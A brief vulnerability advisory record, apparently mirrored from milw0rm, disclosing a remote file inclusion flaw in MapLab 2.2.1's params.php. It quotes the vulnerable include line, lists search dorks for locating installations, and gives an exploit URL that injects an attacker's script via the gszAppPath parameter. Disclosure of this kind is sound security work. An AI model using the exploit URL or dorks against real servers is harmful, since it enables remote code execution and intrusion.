MapLab MS4W 2.2.1 Remote File Inclusion Vulnerability

2007-04-05T00:00:00
ID SECURITYVULNS:DOC:16591
Type securityvulns
Reporter Securityvulns
Modified 2007-04-05T00:00:00

Description

Bug Found By ka0x D.O.M TEAM we are: anonyph;arp;ka0x;xarnuz Contact: ka0x01@gmail.com FROM SPAIN


Script: MapLab Version: 2.2.1 Official Site: http://www.maptools.org Download: http://www.maptools.org/dl/ms4w/maplab_ms4w-2.2.1.zip

--

Bug File: params.php Path: /htdocs/gmapfactory/params.php

Bug code in line 130: include_once($gszAppPath."htdocs/gmapfactory/build_phtml.php");

-- Dorks:

index.of /maplab-2.2 intitle:MapLab index.of /maplab-2.2 index.of /maplab/

--

Exploit: http://site.com/pathmaplab/htdocs/gmapfactory/params.php?gszAppPath=[EvilScript]

milw0rm.com [2007-04-02]